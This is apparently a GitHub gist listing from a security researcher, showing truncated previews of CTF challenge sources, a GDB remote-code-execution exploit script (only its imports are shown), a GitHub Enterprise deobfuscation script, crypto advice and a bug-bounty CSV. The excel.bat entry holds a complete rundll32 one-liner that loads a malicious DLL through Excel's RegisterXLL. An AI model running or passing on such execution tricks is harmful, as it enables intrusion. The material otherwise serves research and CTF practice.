View app.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| #coding=utf-8 | |
| import web, settings | |
| urls = ( | |
| '/uploads/(.*)', 'download', | |
| '([a-z0-9\/]*)', 'dispatcher' | |
| ) | |
| class dispatcher: |
orangetw
/ gist:eae51418694bcb34cbf7
Created
May 24, 2015 14:29
(Updated) Cryptographic Right Answers
View gist:eae51418694bcb34cbf7
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **Encrypting data** (*Was: AES-CTR with HMAC*): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM. | |
| *You care about this if: you're hiding information from users or the network.* | |
| All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated. | |
| *Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.* | |
| **Symmetric key length** (*Was: Use 256 bit keys* |
orangetw
/ pwn_gdb.py
Created
August 31, 2015 15:09
Remote Code Execution on GDB Remote Debugging Protocol
View pwn_gdb.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding: UTF-8 | |
| # | |
| import sys | |
| import gdb | |
| import socket | |
| import struct | |
| import binascii | |
| DEBUG = False |
View sqlpwn.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| sqlpwn by orange | |
| Don't brute force or you will be banned ! | |
| */ | |
| session_start(); | |
| error_reporting(0); | |
| include "template.html"; |
View babyfirst.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| highlight_file(__FILE__); | |
| $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR']; | |
| if ( !file_exists($dir) ) | |
| mkdir($dir); | |
| chdir($dir); | |
| $args = $_GET['args']; | |
| for ( $i=0; $i<count($args); $i++ ){ |
View index.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| include "config.php"; | |
| mysql_connect($dbhost, $dbuser, $dbpass); | |
| mysql_select_db($dbname); | |
| function escape($str){ | |
| $str = strtolower($str); | |
| $str = str_replace("'", "", $str); | |
| $str = str_replace("\\", "", $str); |
View nanana.xxd
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ | |
| 0000010: 0200 3e00 0100 0000 2008 4000 0000 0000 ..>..... .@..... | |
| 0000020: 4000 0000 0000 0000 c811 0000 0000 0000 @............... | |
| 0000030: 0000 0000 4000 3800 0900 4000 1c00 1b00 ....@.8...@..... | |
| 0000040: 0600 0000 0500 0000 4000 0000 0000 0000 ........@....... | |
| 0000050: 4000 4000 0000 0000 4000 4000 0000 0000 @.@.....@.@..... | |
| 0000060: f801 0000 0000 0000 f801 0000 0000 0000 ................ | |
| 0000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................ | |
| 0000080: 3802 0000 0000 0000 3802 4000 0000 0000 8.......8.@..... | |
| 0000090: 3802 4000 0000 0000 1c00 0000 0000 0000 8.@............. |
orangetw
/ ruby_revealer.sh
Created
December 25, 2016 20:48
— forked from geoff-nixon/ruby_revealer.sh
View ruby_revealer.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/sudo sh | |
| ## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+. | |
| ## From `strings ruby_concealer.so`: | |
| ## | |
| ## > This obfuscation is intended to discourage GitHub Enterprise customers | |
| ## > from making modifications to the VM. | |
| ## | |
| ## Well, good, as long as its not intended to discourage *me* from doing this! |
orangetw
/ bounties.csv
Created
April 18, 2017 12:40
— forked from nuthanmunaiah/bounties.csv
View bounties.csv
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cve | product | bounty | source | |
|---|---|---|---|---|
| CVE-2014-0257 | .NET Framework | 5,000.00 | https://hackerone.com/reports/18851 | |
| CVE-2015-3842 | Android | 2,000.00 | https://code.google.com/p/android/issues/detail?id=177610 | |
| CVE-2015-3847 | Android | 1,500.00 | https://code.google.com/p/android/issues/detail?id=179147 | |
| CVE-2015-3860 | Android | 500.00 | https://code.google.com/p/android/issues/detail?id=178139 | |
| CVE-2015-3862 | Android | 333.00 | https://code.google.com/p/android/issues/detail?id=181895 | |
| CVE-2015-3865 | Android | 1,500.00 | https://code.google.com/p/android/issues/detail?id=182294 | |
| CVE-2015-3867 | Android | 4,000.00 | https://code.google.com/p/android/issues/detail?id=182838 | |
| CVE-2015-3868 | Android | 4,000.00 | https://code.google.com/p/android/issues/detail?id=182146 | |
| CVE-2015-3869 | Android | 3,000.00 | https://code.google.com/p/android/issues/detail?id=182053 |
orangetw
/ excel.bat
Created
July 22, 2017 10:17
— forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM rundll32 mshtml.dll HTA one-liner command: | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
OlderNewer